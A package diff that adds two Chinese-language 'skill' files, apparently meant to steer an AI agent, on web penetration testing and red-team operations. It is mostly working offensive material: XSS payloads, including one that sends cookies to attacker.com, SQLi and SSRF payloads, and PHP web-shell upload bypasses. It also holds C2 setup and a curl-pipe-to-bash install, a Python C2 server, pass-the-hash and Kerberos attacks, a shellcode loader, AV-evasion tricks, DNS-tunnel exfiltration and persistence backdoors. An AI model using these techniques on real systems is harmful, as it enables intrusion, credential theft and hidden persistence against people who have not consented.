code-abyss 1.5.1

package/skills/security/pentest.md

@@ -0,0 +1,226 @@
+---
+name: pentest
+description: 全栈渗透测试。Web渗透、API安全、内网渗透、OWASP Top 10。当用户提到渗透测试、Web安全、API安全、漏洞挖掘、Burp、XSS、SQLi、SSRF、越权、BOLA时使用。
+---
+
+# 🔥 赤焰秘典 · 渗透测试 (Penetration Testing)
+
+
+## 渗透测试流程
+
+```
+┌─────────────────────────────────────────────────────────────┐
+│                    渗透测试流程                               │
+├─────────────────────────────────────────────────────────────┤
+│  Phase 1: 信息收集                                           │
+│  ├─ 目标识别 → 技术栈指纹 → WAF检测 → 端口扫描              │
+│  └─ 目录扫描 → 参数发现 → JS分析                            │
+│                        ↓                                     │
+│  Phase 2: 漏洞扫描                                           │
+│  ├─ OWASP Top 10 全覆盖                                      │
+│  ├─ 技术栈特定漏洞                                           │
+│  └─ 业务逻辑漏洞                                             │
+│                        ↓                                     │
+│  Phase 3: 漏洞利用                                           │
+│  ├─ PoC验证 → 数据提取 → 权限提升                           │
+│  └─ 横向移动 → 持久化                                        │
+│                        ↓                                     │
+│  Phase 4: 报告输出                                           │
+│  └─ 按严重性分级 → 修复建议 → 复测验证                      │
+└─────────────────────────────────────────────────────────────┘
+```
+
+## OWASP Top 10 测试
+
+| 漏洞 | 测试方法 | Payload 示例 |
+|------|----------|--------------|
+| A01 访问控制 | IDOR、越权、JWT伪造 | 替换ID访问他人数据 |
+| A02 加密失败 | HTTPS、敏感数据明文 | 抓包分析 |
+| A03 注入 | SQLi、XSS、CMDi、SSTI | `' OR '1'='1` |
+| A04 不安全设计 | 业务逻辑漏洞 | 流程绕过 |
+| A05 配置错误 | 默认凭证、目录遍历 | `/admin` |
+| A06 脆弱组件 | CVE扫描 | Nuclei模板 |
+| A07 认证失败 | 弱密码、会话固定 | 爆破、重放 |
+| A08 数据完整性 | 反序列化 | 恶意对象 |
+| A09 日志不足 | 敏感信息泄露 | 错误信息 |
+| A10 SSRF | 内网探测 | `http://127.0.0.1` |
+
+## Web 渗透测试
+
+### XSS Payload
+```html
+<script>alert(1)</script>
+<img src=x onerror=alert(1)>
+<svg/onload=alert(1)>
+javascript:alert(1)
+<img src=x onerror="fetch('http://attacker.com/?c='+document.cookie)">
+```
+
+### SQL 注入
+```sql
+-- 检测
+' OR '1'='1
+1' AND SLEEP(5)--
+1 UNION SELECT 1,2,3--
+
+-- 数据提取
+1 UNION SELECT table_name,2 FROM information_schema.tables--
+1 UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name='users'--
+```
+
+### SSRF Payload
+```
+http://127.0.0.1:80
+http://169.254.169.254/latest/meta-data/
+file:///etc/passwd
+gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0ainfo
+dict://127.0.0.1:6379/info
+```
+
+### 文件上传绕过
+```
+shell.php.jpg          # 双扩展名
+shell.phtml            # 替代扩展名
+shell.php%00.jpg       # 空字节截断
+shell.php/.            # 路径混淆
+Content-Type: image/jpeg  # MIME绕过
+GIF89a<?php system($_GET['cmd']);?>  # 文件头绕过
+```
+
+## API 安全测试
+
+### OWASP API Top 10
+
+| 风险 | 描述 | 测试方法 |
+|------|------|----------|
+| API1 BOLA | 对象级授权失效 | 替换ID访问他人数据 |
+| API2 认证失效 | 认证机制缺陷 | 弱Token、无限制 |
+| API3 属性级授权 | 返回过多数据 | 检查响应字段 |
+| API4 资源消耗 | 无速率限制 | 批量请求测试 |
+| API5 BFLA | 功能级授权失效 | 低权限调用高权限API |
+
+### BOLA 测试
+```python
+def test_bola(base_url, token):
+    """测试对象级授权漏洞"""
+    headers = {"Authorization": f"Bearer {token}"}
+    my_id = 100
+
+    for other_id in [1, 2, 99, 101, 999]:
+        resp = requests.get(f"{base_url}/api/users/{other_id}", headers=headers)
+        if resp.status_code == 200:
+            print(f"[VULN] BOLA: Can access user {other_id}")
+```
+
+### JWT 测试
+```python
+import jwt
+
+def test_jwt_vulns(token):
+    """JWT 常见漏洞测试"""
+    payload = jwt.decode(token, options={"verify_signature": False})
+
+    # 1. alg=none 绕过
+    none_token = jwt.encode(payload, None, algorithm="none")
+
+    # 2. 弱密钥测试
+    weak_secrets = ["secret", "password", "123456", "key"]
+    for secret in weak_secrets:
+        try:
+            jwt.decode(token, secret, algorithms=["HS256"])
+            print(f"[VULN] Weak secret: {secret}")
+        except: pass
+```
+
+### GraphQL 测试
+```graphql
+# 内省查询 - 获取 Schema
+{ __schema { types { name fields { name } } } }
+
+# 批量查询攻击
+query {
+  user1: user(id: 1) { email }
+  user2: user(id: 2) { email }
+}
+
+# 深度嵌套 DoS
+{ user(id: 1) { friends { friends { friends { name } } } } }
+```
+
+## 技术栈特定测试
+
+### Laravel/PHP
+```yaml
+critical_paths:
+  - /install              # CRITICAL - 安装漏洞
+  - /composer.json        # HIGH - 依赖泄露
+  - /.env                 # HIGH - 配置泄露
+  - /storage/logs         # MEDIUM - 日志泄露
+```
+
+### Spring Boot
+```yaml
+critical_paths:
+  - /actuator/env         # CRITICAL - 环境变量
+  - /actuator/heapdump    # CRITICAL - 内存转储
+  - /actuator/mappings    # HIGH - 路由泄露
+```
+
+### WordPress
+```yaml
+critical_paths:
+  - /wp-admin/install.php # CRITICAL - 重装漏洞
+  - /wp-config.php.bak    # HIGH - 配置备份
+  - /xmlrpc.php           # MEDIUM - 爆破入口
+```
+
+## 常用工具
+
+| 工具 | 用途 |
+|------|------|
+| Burp Suite | 代理抓包、漏洞扫描 |
+| sqlmap | SQL注入自动化 |
+| Nuclei | 漏洞模板扫描 |
+| ffuf | 目录/参数爆破 |
+| httpx | 批量探测 |
+| XSStrike | XSS检测 |
+| jwt_tool | JWT测试 |
+| Arjun | 参数发现 |
+
+## Burp Suite 技巧
+
+```
+# Intruder 爆破
+Payload: 字典/数字范围
+Position: 标记参数 §param§
+
+# Repeater 手动测试
+修改参数 → 发送 → 分析响应
+
+# 插件推荐
+- HaE (高亮敏感信息)
+- Autorize (越权检测)
+- JSON Beautifier
+```
+
+## 报告格式
+
+```markdown
+# 渗透测试报告
+
+## 🔴 CRITICAL
+### 1. SQL注入 - /api/users
+- **位置**: id 参数
+- **PoC**: `id=1' AND SLEEP(5)--`
+- **影响**: 数据库完全泄露
+- **修复**: 使用参数化查询
+
+## 🟠 HIGH
+...
+
+## 🟡 MEDIUM
+...
+```
+
+---
+

package/skills/security/red-team.md

@@ -0,0 +1,321 @@
+---
+name: red-team
+description: 红队攻击技术。PoC开发、C2框架、横向移动、权限提升、免杀技术。当用户提到红队、PoC、C2、横向移动、PTH、免杀、Cobalt Strike、Sliver、提权时使用。
+---
+
+# 🔥 赤焰秘典 · 红队攻击 (Red Team)
+
+
+## 攻击链 (Kill Chain)
+
+```
+侦察 → 武器化 → 投递 → 利用 → 安装 → C2 → 行动
+  │        │       │      │       │      │      │
+  └─ OSINT ─┴─ PoC ─┴─ 钓鱼 ─┴─ 提权 ─┴─ 持久 ─┴─ 横向
+```
+
+## PoC 开发
+
+### 标准 PoC 结构
+```python
+#!/usr/bin/env python3
+"""
+漏洞名称: CVE-XXXX-XXXX
+影响版本: x.x.x - x.x.x
+漏洞类型: RCE/SQLi/XSS/SSRF
+仅用于授权测试
+"""
+import requests
+import argparse
+
+class POC:
+    def __init__(self, target: str):
+        self.target = target.rstrip('/')
+        self.session = requests.Session()
+        self.session.headers = {
+            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
+        }
+
+    def check(self) -> bool:
+        """无害检测"""
+        try:
+            # 使用延时、DNS外带等无害方式验证
+            pass
+        except Exception as e:
+            return False
+
+    def exploit(self, cmd: str) -> str:
+        """漏洞利用"""
+        pass
+
+def main():
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-u', '--url', required=True)
+    parser.add_argument('-c', '--cmd', default='id')
+    args = parser.parse_args()
+
+    poc = POC(args.url)
+    if poc.check():
+        print(f"[+] Vulnerable!")
+        print(poc.exploit(args.cmd))
+    else:
+        print("[-] Not vulnerable")
+
+if __name__ == '__main__':
+    main()
+```
+
+## C2 框架
+
+### Sliver (推荐开源)
+```bash
+# 安装
+curl https://sliver.sh/install | sudo bash
+
+# 生成 Implant
+sliver > generate --mtls 192.168.1.100 --os windows --save implant.exe
+sliver > generate --http 192.168.1.100 --os linux --save implant
+
+# 启动监听
+sliver > mtls --lhost 0.0.0.0 --lport 8888
+sliver > http --lhost 0.0.0.0 --lport 80
+
+# 会话操作
+sliver > sessions
+sliver > use SESSION_ID
+sliver (SESSION) > shell
+sliver (SESSION) > download /etc/passwd
+sliver (SESSION) > upload local remote
+```
+
+### Metasploit
+```bash
+# 生成 Payload
+msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe > shell.exe
+
+# 监听
+msf6 > use exploit/multi/handler
+msf6 > set payload windows/x64/meterpreter/reverse_tcp
+msf6 > set LHOST 0.0.0.0
+msf6 > run
+
+# Meterpreter
+meterpreter > getsystem
+meterpreter > hashdump
+meterpreter > load kiwi
+meterpreter > creds_all
+```
+
+### 简易 HTTP C2
+```python
+# Server
+from flask import Flask, request, jsonify
+import base64
+
+app = Flask(__name__)
+agents, tasks = {}, {}
+
+@app.route('/beacon/<agent_id>')
+def beacon(agent_id):
+    if tasks.get(agent_id):
+        return jsonify({"task": tasks[agent_id].pop(0)})
+    return jsonify({"task": None})
+
+@app.route('/result/<agent_id>', methods=['POST'])
+def result(agent_id):
+    output = base64.b64decode(request.json['output']).decode()
+    print(f"[{agent_id}] {output}")
+    return jsonify({"status": "ok"})
+```
+
+## 横向移动
+
+### Pass-the-Hash (PTH)
+```bash
+# Impacket
+psexec.py -hashes :NTLM_HASH administrator@TARGET
+wmiexec.py -hashes :NTLM_HASH administrator@TARGET
+smbexec.py -hashes :NTLM_HASH administrator@TARGET
+
+# CrackMapExec
+crackmapexec smb TARGET -u admin -H HASH -x "whoami"
+crackmapexec smb 192.168.1.0/24 -u admin -H HASH --shares
+
+# Mimikatz
+sekurlsa::pth /user:admin /domain:DOMAIN /ntlm:HASH /run:cmd.exe
+```
+
+### Pass-the-Ticket (PTT)
+```bash
+# 导出票据
+mimikatz # sekurlsa::tickets /export
+
+# 注入票据
+mimikatz # kerberos::ptt ticket.kirbi
+
+# Rubeus
+Rubeus.exe ptt /ticket:ticket.kirbi
+```
+
+### Kerberos 攻击
+```bash
+# Kerberoasting
+GetUserSPNs.py DOMAIN/user:pass -dc-ip DC_IP -request
+
+# AS-REP Roasting
+GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC_IP
+
+# Golden Ticket
+mimikatz # kerberos::golden /user:admin /domain:DOMAIN /sid:S-1-5-21-xxx /krbtgt:HASH /ptt
+```
+
+### 远程执行方法
+```bash
+# WinRM
+evil-winrm -i TARGET -u user -H HASH
+
+# PowerShell Remoting
+Enter-PSSession -ComputerName TARGET -Credential DOMAIN\user
+Invoke-Command -ComputerName TARGET -ScriptBlock {whoami}
+
+# WMI
+wmic /node:TARGET /user:admin /password:pass process call create "cmd.exe /c whoami"
+```
+
+## 权限提升
+
+### Windows 提权
+```powershell
+# 信息收集
+whoami /priv
+systeminfo
+net user
+net localgroup administrators
+
+# 常见提权路径
+- SeImpersonatePrivilege → Potato系列
+- 服务配置错误 → 服务路径劫持
+- 计划任务 → 任务劫持
+- AlwaysInstallElevated → MSI提权
+- 未打补丁 → 内核漏洞
+
+# Potato 提权
+JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t *
+PrintSpoofer.exe -i -c cmd
+GodPotato.exe -cmd "cmd /c whoami"
+```
+
+### Linux 提权
+```bash
+# 信息收集
+id
+uname -a
+cat /etc/passwd
+sudo -l
+find / -perm -4000 2>/dev/null
+
+# 常见提权路径
+- SUID 二进制 → GTFOBins
+- sudo 配置错误 → sudo提权
+- 内核漏洞 → DirtyPipe/DirtyCow
+- 定时任务 → cron劫持
+- 容器逃逸 → Docker/K8s
+
+# SUID 利用
+find / -perm -4000 2>/dev/null
+# 查 GTFOBins: https://gtfobins.github.io/
+```
+
+## 免杀技术
+
+### 基础免杀
+```python
+# 1. 字符串混淆
+import base64
+payload = base64.b64encode(b"malicious_code").decode()
+exec(base64.b64decode(payload))
+
+# 2. 动态加载
+import importlib
+module = importlib.import_module("os")
+getattr(module, "system")("whoami")
+
+# 3. 加密 Payload
+from Crypto.Cipher import AES
+# 运行时解密执行
+```
+
+### Shellcode 加载
+```python
+import ctypes
+
+shellcode = b"\xfc\x48\x83..."  # msfvenom 生成
+
+# Windows
+ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
+ptr = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x3000, 0x40)
+ctypes.windll.kernel32.RtlMoveMemory(ptr, shellcode, len(shellcode))
+ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
+```
+
+### 隐蔽通信
+```python
+# DNS 隧道
+def dns_exfil(data, domain):
+    encoded = base64.b32encode(data.encode()).decode()
+    for chunk in [encoded[i:i+63] for i in range(0, len(encoded), 63)]:
+        dns.resolver.resolve(f"{chunk}.{domain}", 'A')
+
+# 域前置
+def domain_fronting(real_host, cdn_domain, data):
+    headers = {"Host": real_host}
+    requests.post(f"https://{cdn_domain}/api", json=data, headers=headers)
+```
+
+## 持久化
+
+### Windows
+```powershell
+# 注册表
+reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "C:\backdoor.exe"
+
+# 计划任务
+schtasks /create /tn "Update" /tr "C:\backdoor.exe" /sc onlogon
+
+# 服务
+sc create backdoor binPath= "C:\backdoor.exe" start= auto
+
+# WMI 事件订阅
+# 进程启动时触发
+```
+
+### Linux
+```bash
+# Crontab
+echo "* * * * * /tmp/backdoor" >> /var/spool/cron/root
+
+# SSH 密钥
+echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
+
+# 服务
+# 创建 systemd service
+
+# LD_PRELOAD
+echo "/tmp/evil.so" >> /etc/ld.so.preload
+```
+
+## 工具清单
+
+| 工具 | 用途 |
+|------|------|
+| Sliver | 开源 C2 框架 |
+| Metasploit | 渗透测试框架 |
+| Cobalt Strike | 商业 C2 |
+| Impacket | Windows 协议工具 |
+| CrackMapExec | 批量横向 |
+| Mimikatz | 凭证提取 |
+| Rubeus | Kerberos 工具 |
+| BloodHound | AD 路径分析 |
+
+---
+